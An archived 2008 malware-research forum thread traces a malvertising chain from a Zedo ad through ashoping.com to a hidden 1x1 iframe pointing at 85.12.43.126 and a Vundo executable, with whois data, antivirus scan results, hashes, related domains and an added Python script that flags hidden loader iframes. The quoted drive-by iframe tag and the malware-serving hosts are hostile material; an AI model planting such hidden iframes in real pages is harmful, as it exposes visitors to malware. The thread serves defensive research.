Full Version: 85.12.43.126 spreading malware via Zedo
B.I.S.S. Forums > Malware Research Forum > Malware IP Research Section
wagdoll
zedo leaderboard:

CODE
<iframe height="90" frameborder="0" width="728" scrolling="no" allowtransparency="true" marginwidth="0" marginheight="0" src="http://d3.zedo.com/jsc/d3/ff2.html?n=790;c=338/1;s=296;d=14;w=728;h=90">


(example publisher website: valeptr.com/pages/ptp.php)

As often happens with Zedo, this ad being served is not a graphic banner but a full webpage.

Skipping the code, it's loading this site in that iframe:

CODE
<iframe height="100%" frameborder="0" width="100%" scrolling="yes" src="http://ashoping.com/?sid=aff0035">


That site is hotlinking images from another site, so this seems to be a copy/fake job (the images are hotlinked from a site called Netpaidshopping.com; I believe this is the genuine site).

Below the </html> on ashoping.com there is an invisible iframe:

CODE
<iframe height="1" width="1" src="http://85.12.43.126/css/index.php?sid=6a5b6a5362576f5d6f5e630a7a157d0e6f52665e6a52645559" style="outline-color: -moz-use-text-color; outline-style: none; outline-width: medium;">


That IP address is also the server that ashoping.com is located on, according to whois details:

QUOTE
IP Address: 85.12.43.124
IP Location Netherlands - Netherlands - Xentronix

Domain servers in listed order:

NS1.ASHOPING.COM 193.33.61.161
NS2.ASHOPING.COM 85.12.43.119

Created: 2008-10-13


The page in the iframe is giving a SID timeout response, but searching Google it appears that the IP has a history of malware: [url=http://www.bitdefender.com/VIRUS-1000421-en--Trojan.JS.Injector.E.html]Trojan.JS.Injector[/url]
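The chain described in this post (publisher page -> Zedo frame -> ashoping.com -> 1x1 iframe to a bare IP, placed after </html>) is exactly the kind of thing worth automating when triaging a captured ad. The following is an added example, not code from the thread or from any of the sites it names: it parses captured HTML, flags iframes that look like drive-by loaders (tiny or zero-size, hidden by CSS, src is a bare IP, placed after the closing </html> tag), and walks the nested-frame chain across a set of saved pages. The iframe tags in the sample captures are the ones quoted in the post; the surrounding markup and the URL-to-page mapping are constructed for the example, and a dict lookup stands in for an HTTP fetch.

```python
"""Hidden-iframe and frame-chain triage for captured ad pages.

Added example; not code from the B.I.S.S. thread or the sites it names.
The page bodies at the bottom are constructed: the iframe tags are the
ones quoted in the thread, the filler markup and URL mapping are assumed.
"""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class IframeCollector(HTMLParser):
    """Collect every <iframe> start tag with its attributes, in order,
    and remember whether it appeared after the document's </html>."""

    def __init__(self):
        super().__init__()
        self.frames = []
        self.html_closed = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            frame = {name: (value or "") for name, value in attrs}
            frame["_after_html_close"] = self.html_closed
            self.frames.append(frame)

    def handle_endtag(self, tag):
        if tag == "html":
            self.html_closed = True


def _dim(value):
    """Parse a width/height attribute in px; '100%' or missing -> None."""
    m = re.match(r"\s*(\d+)\s*(px)?\s*$", value or "")
    return int(m.group(1)) if m else None


def _is_bare_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify_iframe(frame):
    """Return the reasons an iframe looks like a loader (empty = unremarkable)."""
    reasons = []
    w, h = _dim(frame.get("width")), _dim(frame.get("height"))
    if w is not None and h is not None and w <= 1 and h <= 1:
        reasons.append("tiny (%dx%d)" % (w, h))
    if HIDDEN_CSS.search(frame.get("style", "")):
        reasons.append("hidden by CSS")
    if _is_bare_ip(urlsplit(frame.get("src", "")).hostname or ""):
        reasons.append("src is a bare IP")
    if frame["_after_html_close"]:
        reasons.append("placed after </html>")
    return reasons


def triage(html_text):
    """List every iframe in a page as {"src": ..., "reasons": [...]}."""
    parser = IframeCollector()
    parser.feed(html_text)
    parser.close()
    return [{"src": f.get("src", ""), "reasons": classify_iframe(f)}
            for f in parser.frames]


def frame_edges(start_url, fetch, max_depth=5):
    """Depth-first walk of nested iframes from start_url.

    fetch(url) returns a page's HTML, or None if it was not captured.
    Returns (parent_url, child_src, reasons) edges in discovery order."""
    edges, seen = [], set()

    def walk(url, depth):
        if depth > max_depth or url in seen:
            return
        seen.add(url)
        html_text = fetch(url)
        if html_text is None:
            return
        for f in triage(html_text):
            edges.append((url, f["src"], f["reasons"]))
            walk(f["src"], depth + 1)

    walk(start_url, 0)
    return edges


# Constructed captures: real iframe tags from the thread, invented filler.
PUBLISHER_URL = "http://valeptr.com/pages/ptp.php"
ZEDO_URL = "http://d3.zedo.com/jsc/d3/ff2.html?n=790;c=338/1;s=296;d=14;w=728;h=90"
ASHOPING_URL = "http://ashoping.com/?sid=aff0035"
LOADER_URL = ("http://85.12.43.126/css/index.php?sid="
              "6a5b6a5362576f5d6f5e630a7a157d0e6f52665e6a52645559")

CAPTURED_PAGES = {
    PUBLISHER_URL: '<html><body><p>paid to promote</p>'
                   '<iframe height="90" frameborder="0" width="728" scrolling="no" '
                   'src="' + ZEDO_URL + '"></iframe></body></html>',
    ZEDO_URL: '<html><body><iframe height="100%" frameborder="0" width="100%" '
              'scrolling="yes" src="' + ASHOPING_URL + '"></iframe></body></html>',
    ASHOPING_URL: '<html><body><img src="http://netpaidshopping.com/logo.gif">'
                  '</body></html>\n<iframe height="1" width="1" src="' + LOADER_URL +
                  '" style="outline-color: -moz-use-text-color; outline-style: none;">',
}

if __name__ == "__main__":
    for parent, child, reasons in frame_edges(PUBLISHER_URL, CAPTURED_PAGES.get):
        print("%s\n  -> %s  %s" % (parent, child, ", ".join(reasons) or "ok"))
```

Run stand-alone it prints the three-hop chain, with only the last hop flagged. Two design points: the parser keeps going after </html> because browsers do, so markup appended after the document end (a common injection spot) is still collected; and the walk records the chain even when the final loader page was not captured, which is what happens in practice once the SID has expired.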
Kimberly
Thanks wagdoll, I'll have a peek at this one.

QUOTE
The page in the iframe is giving a SID timeout response,
That's normal; the SID is a session cookie, usually based on date/time etc. It's only valid for a short time, and you need the cookie that goes with it.

Kimberly
85.12.43.126 has an obfuscated script that leads to 64.22.81.244, which hosts an executable. I got hit on clicksor / popunder.adtrgt.com by the same stuff (bigmp3online), and buynow21.com - 85.17.166.137 is also serving the same iframe to 85.12.43.126.

File winu8FxBK3R9CXHd.exe received on 12.06.2008 17:04:18 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2008.12.6.0 2008.12.06 -
AntiVir 7.9.0.42 2008.12.05 -
Authentium 5.1.0.4 2008.12.06 -
Avast 4.8.1281.0 2008.12.06 -
AVG 8.0.0.199 2008.12.05 -
BitDefender 7.2 2008.12.06 -
CAT-QuickHeal 10.00 2008.12.06 (Suspicious) - DNAScan
ClamAV 0.94.1 2008.12.06 -
Comodo 698 2008.12.06 -
DrWeb 4.44.0.09170 2008.12.06 -
eSafe 7.0.17.0 2008.12.04 Suspicious File
eTrust-Vet 31.6.6245 2008.12.05 -
Ewido 4.0 2008.12.06 -
F-Prot 4.4.4.56 2008.12.04 -
F-Secure 8.0.14332.0 2008.12.06 -
Fortinet 3.117.0.0 2008.12.06 -
GData 19 2008.12.06 -
Ikarus T3.1.1.45.0 2008.12.06 Trojan.Win32.Vundo
K7AntiVirus 7.10.547 2008.12.06 -
Kaspersky 7.0.0.125 2008.12.06 -
McAfee 5455 2008.12.05 -
McAfee+Artemis 5455 2008.12.05 -
Microsoft 1.4205 2008.12.06 Trojan:Win32/Vundo.gen!AK
NOD32 3668 2008.12.06 -
Norman 5.80.02 2008.12.05 -
Panda 9.0.0.4 2008.12.06 -
PCTools 4.4.2.0 2008.12.06 -
Prevx1 V2 2008.12.06 Malicious Software
Rising 21.06.52.00 2008.12.06 -
SecureWeb-Gateway 6.7.6 2008.12.06 -
Sophos 4.36.0 2008.12.06 -
Sunbelt 3.1.1832.2 2008.12.01 -
Symantec 10 2008.12.06 -
TheHacker 6.3.1.2.178 2008.12.06 -
TrendMicro 8.700.0.1004 2008.12.05 -
VBA32 3.12.8.10 2008.12.05 -
ViRobot 2008.12.6.1504 2008.12.06 -
VirusBuster 4.5.11.0 2008.12.05 -

Additional information
File size: 62464 bytes
MD5...: a18715f6da0d931977f4046d9221e87b
SHA1..: 145b69620e6a290d78c8f739d76388697d5f9b54
SHA256: b459962b854fffc8a9859eb6a5168863a2371a522a55da45d4d1f3549516df0b


ashoping.com A 85.12.43.124
ns1.ashoping.com 193.33.61.161
ns2.ashoping.com 85.12.43.119
ns3.ashoping.com ?
ns4.ashoping.com ?

hostnames sharing ip with a-records
ns4.financestoc.com

domains using this as nameserver
financestoc.com

domains sharing nameservers
automobilewdew.com
bigmp3online.com <-- through Clicksor advertising (Vundo)
bretick.com
detoxitnow.com
financestoc.com
greatlakemusic.com
mp3cdt.com
travelcardclub.com
zekib.com

subdomains
*.ashoping.com
ns1.ashoping.com
ns2.ashoping.com

mail10.ehlodelivery.net. - 64.22.81.244

Domain Name: EHLODELIVERY.NET
Registrar: NAME.COM LLC
Whois Server: whois.name.com
Name Server: NS1.EHLODELIVERY.NET
Name Server: NS2.EHLODELIVERY.NET
Status: clientTransferProhibited
Updated Date: 28-sep-2008
Creation Date: 15-sep-2008
Expiration Date: 15-sep-2009
REGISTRANT CONTACT INFO
Inet Advertising
Domain Administrator
234 Morrell Rd.
Suite 160
Knoxville
TN
37919
US
Phone: +1.6155126750
Email Address: inetadvertising.admin@gmail.com
Kimberly
Some reports show that most of the domains above are involved with malware distribution.

automobilewdew.com
https://safeweb.norton.com/report/show?name...omobilewdew.com

bigmp3online.com
https://safeweb.norton.com/report/show?name=bigmp3online.com

detoxitnow.com
https://safeweb.norton.com/report/show?name=detoxitnow.com

financestoc.com
https://safeweb.norton.com/report/show?name=financestoc.com

greatlakemusic.com

mp3cdt.com
https://safeweb.norton.com/report/show?name=mp3cdt.com

zekib.com
QUOTE
The following Internet Connection was established
zekib.com 80 (null) (null)
http://www.threatexpert.com/report.aspx?uid=6810dad6-ee34-4786-bc01-5ed8272f9077